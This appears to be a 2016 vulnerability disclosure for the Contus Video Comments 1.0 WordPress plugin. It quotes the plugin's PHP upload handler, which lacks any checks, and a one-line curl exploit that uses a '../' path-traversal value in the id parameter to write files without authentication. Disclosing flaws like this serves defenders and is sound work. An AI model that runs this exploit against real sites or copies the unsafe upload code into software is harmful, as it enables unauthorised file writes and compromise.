WordPress Contus Video Comments 1.0 File Upload
Posted on 23 June 2016
Title: Unauthenticated remote .jpg file upload in contus-video-comments v1.0 wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2016-06-15 Download Site: https://wordpress.org/plugins/contus-video-comments/ Vendor: https://profiles.wordpress.org/hdflvplayer/ Vendor Notified: 2016-06-16 Vendor Contact: Description: Video comments integrated with the standard comment system of wordpress. Vulnerability: The following code allows any user to upload .jpg files to the WordPress installation. It also allows path traversal with ../. <?php //This project is done by vamapaull: http://blog.vamapaull.com/ //The php code is done with some help from Mihai Bojin: http://www.mihaibojin.com/ if(isset($GLOBALS["HTTP_RAW_POST_DATA"])){ $jpg = $GLOBALS["HTTP_RAW_POST_DATA"]; $filename = "images/". $_GET["id"]. ".jpg"; file_put_contents($filename, $jpg); } else{ echo "Encoded JPEG information not received."; } ?> CVE-TBD Exploit Code: • $ curl --data @image.jpg "http://wp-site/wp-content/plugins/contus-video-comments/save.php?id=../image"
